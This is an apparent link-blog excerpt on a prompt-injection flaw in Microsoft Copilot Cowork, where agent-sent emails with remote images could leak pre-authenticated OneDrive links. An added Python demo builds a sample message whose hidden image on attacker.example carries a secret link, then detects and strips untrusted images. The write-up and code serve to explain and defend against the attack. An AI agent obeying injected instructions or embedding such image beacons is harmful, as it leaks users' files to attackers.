🔒 Security

Microsoft Copilot Cowork Exfiltrates Files

simonwillison.net · 2026-05-26 · excerpt

Summary: the post describes a data-exfiltration problem in Microsoft Copilot Cowork. The product let agents send email to the user's own inbox without approval; because those messages can load external images, a prompt-injected agent could leak data through the image URLs, including pre-authenticated OneDrive download links that let an attacker fetch the files. The author's broader point is that preventing exfiltration remains the biggest challenge in designing agentic systems.

Simon Willison

26th May 2026 - Link Blog

Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:

Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
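The chain above (agent-authored mail, a remote image, a secret in the image URL) is easy to model and easy to check for. The following is an added example, not code from Simon Willison's post or from Microsoft: it builds a constructed HTML message of the kind a prompt-injected agent could produce, shows how the secret rides in the image request, and applies the check a mail-sending tool should run before delivery. The domains, the allow-list of image hosts and the shape of the "pre-authenticated link" are all assumptions; the real OneDrive link format is not reproduced.

```python
"""Image-based exfiltration from agent-authored e-mail: demo and outbound check.

Added example, not from the original post or from Microsoft. All hosts,
the link format and the HTML body are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, quote, urlparse

# Assumption: the only hosts an agent-authored message may load images from.
TRUSTED_IMAGE_HOSTS = {"cdn.corp.example"}

# Constructed stand-in for a pre-authenticated download link (not the real
# OneDrive URL shape). Anyone holding this URL can fetch the file.
SECRET_LINK = "https://onedrive.example/download?auth=pre-authenticated-token"

# Constructed message body: what an agent under prompt injection might send to
# the user's own inbox. The 1x1 image smuggles SECRET_LINK to the attacker's
# host the moment the mail client renders it; the logo image is legitimate.
AGENT_EMAIL_HTML = (
    "<html><body><p>Your weekly summary is attached.</p>"
    f'<img src="https://attacker.example/pixel.png?d={quote(SECRET_LINK, safe="")}"'
    ' width="1" height="1">'
    '<img src="https://cdn.corp.example/logo.png">'
    "</body></html>"
)


class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag (self-closing or not)."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def extract_image_srcs(html):
    parser = _ImgCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def classify_image(src):
    """Describe one image reference: where it fetches from and what it carries.

    leaked_urls lists query values that are themselves URLs, the obvious way a
    download link ends up in the request. A remote image on an untrusted host
    is a problem even with an empty query: the request itself is the channel.
    """
    parts = urlparse(src)
    host = (parts.hostname or "").lower()
    remote = parts.scheme in ("http", "https")
    leaked = [
        value
        for _, value in parse_qsl(parts.query, keep_blank_values=True)
        if value.lower().startswith(("http://", "https://"))
    ]
    return {
        "src": src,
        "host": host,
        "remote": remote,
        "trusted": remote and host in TRUSTED_IMAGE_HOSTS,
        "leaked_urls": leaked,
    }


def audit_email(html):
    """Return every remote image that is not on the allow-list."""
    return [
        info
        for info in (classify_image(src) for src in extract_image_srcs(html))
        if info["remote"] and not info["trusted"]
    ]


_IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
_SRC_ATTR = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def strip_untrusted_images(html):
    """Drop <img> tags that would fetch from an untrusted host; keep the rest
    (allow-listed hosts, cid: inline attachments, data: URIs)."""

    def replace_tag(match):
        tag = match.group(0)
        src_match = _SRC_ATTR.search(tag)
        src = next((g for g in src_match.groups() if g is not None), "") if src_match else ""
        info = classify_image(src)
        return "" if info["remote"] and not info["trusted"] else tag

    return _IMG_TAG.sub(replace_tag, html)


if __name__ == "__main__":
    for finding in audit_email(AGENT_EMAIL_HTML):
        print("untrusted image host:", finding["host"], "carries:", finding["leaked_urls"])
    print(strip_untrusted_images(AGENT_EMAIL_HTML))
```

The check deliberately flags every remote image on a non-allow-listed host rather than only those whose query string visibly contains a link: data can be encoded in the path, in a subdomain, or split across several requests, so the fix is to refuse untrusted outbound fetches from agent-authored content (or to require approval for the send), not to pattern-match the payload.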
